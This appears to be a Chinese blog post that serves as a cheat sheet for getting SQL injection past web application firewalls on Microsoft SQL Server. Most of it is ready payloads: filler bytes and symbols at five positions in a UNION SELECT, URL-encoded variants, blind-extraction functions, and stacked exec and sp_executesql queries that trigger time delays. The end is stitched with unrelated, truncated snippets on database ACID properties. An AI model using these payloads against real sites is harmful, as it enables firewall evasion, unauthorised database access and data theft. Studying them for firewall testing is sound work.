探索玩了mysql特性,繼續來探索一下mssql特性。
常見有5個位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin
(1)空白字元
mssql可以利用的空白字元有:01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f,20
(2)注釋符號
mssql也可以使用注釋符號/**/
(3)浮點數
select * from admin where id=1.1union select 1,'2',db_name() from admin
(4)1e0的形式:
select * from admin where id=1e0union select 1,'2',db_name() from admin
(5)運算子
包括加(+)、減(-)、乘(*)、除(/)、求于(%)、位與(&)、位或(|)、位異或(^)
select username,password,id from admin where id=1-1union select '1',system_user,3 from admin
select username,password,id from admin where id=1e-union select '1',system_user,3 from admin
(6)小區別:
aspx:[0x00-0x20]、ox2e、[0x30-0x39]、ox45、ox65、[0x80-0xff]、運算子
asp: [0x01-0x20]、ox2e、[0x30-0x39]、ox45、ox65、運算子
單引號:select username,password,id from admin where id=1 and '1'like'1'union select null,null,null
(1)空白字元
mssql可以利用的空白字元有:01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f,20
(2)注釋符號
mssql也可以使用注釋符號/**/
(3)其他符號
: %3a 冒號
select * from admin where id=1 union:select 1,'2',db_name() from:admin
aspx:[0x00-0x20]、0x3a、[0x80-0xff]要組合前面的兩個才能執行,如%3a%a0、%a0%0a
asp: [0x01-0x20] 、0x3a
(1)空白字元
mssql可以利用的空白字元有:01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f,20
(2)注釋符號
mssql也可以使用注釋符號/**/
(3)其他符號
%2b + select * from admin where id=1 union select+1,'2',db_name() from admin
%2d - select * from admin where id=1 union select-1,'2',db_name() from admin
%2e . select * from admin where id=1 union select.1,'2',db_name() from admin
%3a : select * from admin where id=1 union select:1,'2',db_name() from admin
%7e ~ select * from admin where id=1 union select~1,'2',db_name() from admin
(1)空白字元
mssql可以利用的空白字元有:01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f,20
(2)注釋符號
mssql也可以使用注釋符號/**/
(3)其他符號
asp: [0x01-0x20]、0x2e、[0x30-0x39]、0x45、0x65、[0x80-0xff]
aspx:[0x00-0x20]、0x2e、[0x30-0x39]、0x45、0x65、
id=1%20union%20select%201,'2',db_name()%80from%20admin
db_name與()中間 %00-%20 %80-%ff填充
id=1 union select 1,'2',db_name+() from admin
(1)空白字元
mssql可以利用的空白字元有:01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f,20
(2)注釋符號
mssql也可以使用注釋符號/**/
(3)其他符號
: %3a select * from admin where id=1 union:select 1,'2',db_name() from:admin
. %2e select * from admin where id=1 union select 1,'2',db_name() from.information_schema.schemata
asp: [0x01-0x20]、0x2e、0x3a
aspx: [0x00-0x20]、0x2e、0x3a、[0x80-0xff]
(1)字串擷取函式
substring(@@version,1,1)
left(@@version,1)
right(@@version,1)
charindex('test',db_name())
(2)字串轉換函式
ascii(『a』)
char(『97』)
這裡的函式可以在括號之間新增空格的,一些waf過濾不嚴會導致bypass
(3) 其他方式
利用儲存過程
mssql的儲存過程定義為:
declare @s varchar(5000) //申明變數@s 型別為varchar(5000)id=1;exec('wa'+'itfor delay ''0:0:5''')set @ //給@s變數賦值
exec(@s) //執行@s
id=1;declare @test nvarchar(50);set @test='wait'+'for delay ''0:0:5''';exec sp_executesql @test
持續更新中。。。。。。。。。
資料庫特性
事務的原子性 事務的原子性指的是,事務中包含的程式作為資料庫的邏輯工作單位,它所做的對資料改操作要全部執行,要麼全部不執行。這種特性稱為原子性。事務的原子性要求,如果把乙個事務看作是乙個程式,它要麼完整的被執行,要麼完全執行。就是說事務的操縱序列或者完全應用到資料庫或者完全不影響資料庫。這種特性稱為...
資料庫特性
size medium acid acid是描述乙個有效的事務處理系統應提供的4種特性的首字母縮寫詞。acid代表atomicity 原子性 consistency 一致性 isolation 隔離性 和durability 永續性 原子性是指事務處理是原子的。事務處理中的操作要麼全部完成要麼都不執...
資料庫特性
資料庫的acid特性 資料 12 automicity 原子性 consistency 一致性 isolation 隔離性 durability 永續性 原子性 原子性是指事務包含的所有操作要麼全部成功,要麼全部失敗回滾,因此事務的操作如果成功就必須要完全應用到資料庫,如果操作失敗則不能對資料庫有任...